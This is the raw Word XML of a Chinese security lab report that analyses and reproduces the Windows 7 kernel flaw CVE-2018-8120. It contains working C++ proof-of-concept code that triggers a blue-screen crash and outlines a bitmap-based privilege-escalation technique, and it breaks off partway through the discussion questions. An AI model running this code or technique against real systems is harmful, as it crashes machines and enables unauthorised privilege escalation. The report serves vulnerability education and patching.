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黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk42808439"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkStart w:id="1" w:name="_Toc60684266"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、实验简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc60684267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实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/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学习Windows内核漏洞基本原理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学习内核漏洞的基本分析方式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复现CVE-2018-8120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3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc60684268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实验内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本实验涵盖以下主题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20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Windows双机调试环境搭建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rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2018-8120漏洞原理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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows内核漏洞利用思路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3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc60684269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实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Win10 主机，安装Windbg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3"/>
        </w:numPr>
        <w:spacing w:before="180" w:after="180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VMware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15.5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3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Win7 x86虚拟机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"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc60684270"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、实验原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分版本</w:t>
      </w:r>
      <w:r>
        <w:t>Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该漏洞的触发点就是窗口站</w:t>
      </w:r>
      <w:r>
        <w:t>tagWINDOWSTATON对象的指针成员域spklList指向的可能是空地址，如果同时该窗口站关联当前进程，那么调用系统服务函数NtUserSetImeInfoEx设置输入法扩展信息时，会间接调用SetImeInfoEx函数访问spklList指针指向的位于用户进程地址空间的零页内存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果当前进程的零页内存未被映射（事实上零页内存正常是不会被映射的），函数</w:t>
      </w:r>
      <w:r>
        <w:t>SetImeInfoEx的访问操作将引发缺页异常，导致系统BSOD；同样，如果当前进程的零页内存被提前映射成我们精心构造的数据，则有可能恶意利用，造成任意代码执行的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc60684271"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、实验过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc6068427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寻找漏洞点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该漏洞存在于</w:t>
      </w:r>
      <w:r>
        <w:t>Windows7系统win32k.sys（C:/Windows/System32目录下）组件SetImeInfoEx函数中；在一处访问内核对象的数据时，没有判断是否合法即进行访问，将win32k.sys载入IDA中分析可以查看到。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2147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SetImeInfoEx函数中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的漏洞触发点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc60684273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回溯分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>IDA交叉引用查找发现，只有在系统调用函数NtUserSetImeInfoEx中调用该函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5487035" cy="720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77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7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SetImeInfoEx交叉引用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看这部分代码，漏洞所在函数</w:t>
      </w:r>
      <w:r>
        <w:t>SetImeInfoEx()接收2个参数，漏洞的产生和参数1的结构体指针有关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>SetImeInfoE函数的第一个参数来源是GetProcessWindowsStation，下面跟踪一下参数1的来源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>win32k!NtUserSetImeInfoEx() 系统服务函数调用了SetImeInfoEx()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5273675" cy="312166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SetImeInfoEx参数来源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在MSDN上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>对GetProcessWindowStation函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的定义</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4690110" cy="26460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12" cy="26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GetProcessWindowStation函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样，我们就知道了</w:t>
      </w:r>
      <w:r>
        <w:t>pWinStation是Window Station的Handle。在Windows中Handle实际也就是内核的对象引用，这里是WindowsStation对象。在Windbg中查看得到该对象的信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4541520" cy="2971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254" cy="29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tagWINDOWSTATION对象结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对比该</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞触发时引用的位置v3[5]实际是WindowStation结构偏移0x14的数据对象即spklList；而spklList默认为NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。另外在查询该</w:t>
      </w:r>
      <w:r>
        <w:t>API时，同是也能查到关于Window Station其余的API信息，其中关系最紧密的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CreateWindowStation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建一个W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>indow Staion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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HWINSTA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="007D9A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>CreateWindowStationA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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing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LPCSTR                lpwinsta,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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DWORD                 dwFlags,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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ACCESS_MASK           dwDesiredAccess,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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LPSECURITY_ATTRIBUTES lpsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="180" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1200" w:leftChars="5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>
      <w:pPr>
        <w:spacing w:before="180" w:after="18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SetProcessWindowStation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为当前进程设置Wi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ndow Station</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="72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BOOL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="007D9A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>SetProcessWindowStation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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:leftChars="60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HWINSTA hWinSta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="180" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:leftChars="60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>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc6068427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验证POC开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据上面的漏洞点、溯源成因分析。我们可以用相关的</w:t>
      </w:r>
      <w:r>
        <w:t>API接口构造一个简单的POC。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该部分完整代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.h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#pragma once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#include &lt;iostream&gt;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#include &lt;windows.h&gt;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#include &lt;Psapi.h&gt;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#include &lt;intrin.h&gt; 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#pragma comment(lib, "Psapi.lib")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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>__declspec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6699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>naked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi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> NtUserSetImeInfoEx(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E8B57"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> tmp)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_asm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mov esi, tmp;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mov eax, 0x1226; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//系统调用符号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mov edx, 0x7FFE0300; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//ntdll.KiFastSystemCall快速系统调用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call dword ptr[edx];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ret 4;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> main()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008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// 新建一个新的窗口,新建的WindowStation对象其偏移0x14位置的spklList字段的值默认是零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b/>
          <w:bCs/>
          <w:color w:val="2E8B57"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HWINSTA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> hSta = CreateWindowStation(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0,              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//LPCSTR                lpwinsta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0,              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//DWORD                 dwFlags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READ_CONTROL,   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//ACCESS_MASK           dwDesiredAccess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0               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//LPSECURITY_ATTRIBUTES lpsa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008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// 和窗口当前进程关联起来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SetProcessWindowStation(hSta);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/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> buf[0x4];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008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// WindowStation-&gt;spklList字段为0，函数继续执行将触发0地址访问异常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NtUserSetImeInfoEx((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E8B57"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)&amp;buf);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b/>
          <w:bCs/>
          <w:color w:val="006699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> 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  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.cpp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hint="eastAsia"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#include "test.h"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对该部分代码进行编译，我们可以发现在下图位置发生报错，提示出现访问冲突。我们就利用这个冲突部分来对Win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行蓝屏攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4594860" cy="27355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将生成的目标文件导入到Win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机中，并运行。可以发现Win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现蓝屏状况：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="48768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触发蓝屏POC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc6068427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提权Shellcode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据上述实验过程，我们可以发现，如果我们将</w:t>
      </w:r>
      <w:r>
        <w:t>Manager的pvScan0写为Worker的pvScan0所在的地址，那么操控Manager即可随意改变Worker的pvScan0，那么再操控Worker的pvScan0即可进行任意地址写了。意思就为 Manager操控想写的地址，Worker操控写入该地址的内容。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但由于我的VMware版本问题，无法通过Windbg去对其进行调试。因此该部分使用了</w:t>
      </w:r>
      <w:r>
        <w:t>alpha1ab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2018-8120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具进行提权。下图分别是提权前与提权后whoami的运行结果比较：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2011680" cy="335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未提权前</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="92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提权后</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc60684276"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、实验结果与结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="180" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:t>通过本次实验，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析并复现</w:t>
      </w:r>
      <w:r>
        <w:t>了CVE-2018-8120 漏洞，加深了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对Windows系统漏洞</w:t>
      </w:r>
      <w:r>
        <w:t>的了解，并能够编写简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用代码</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次实验的漏洞原理是部分版本</w:t>
      </w:r>
      <w:r>
        <w:t>Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前，该漏洞的防范措施主要是及时地进行系统更新，安装最新版补丁。该漏洞修复程序下载地址如下：</w:t>
      </w:r>
      <w:r>
        <w:t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc60684277"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五、实验思考与讨论、问题的解决</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc60684278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实验思考题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="180" w:after="180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CVE-2018-8120漏洞成因是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:left="420" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Hlk60074417"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该漏洞函数位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>win32k.sys模块的SetImeInfoEx() 函数，该函数在使用一个内核对象的字段之前并没有进行是否为空的判断，当该值为空时，函数直接读取零地址内存。如果在当前进程环境中没有映射零页面，该函数将触发页面错误异常，导致系统蓝屏发生。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="180" w:after="180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Windows7 如何分配NULL地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:left="420" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Hlk60074440"/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ntdll.dll中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NtAllocateVirtualMemory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数可以在指定进程内分配一块指定大小的空间</w:t>
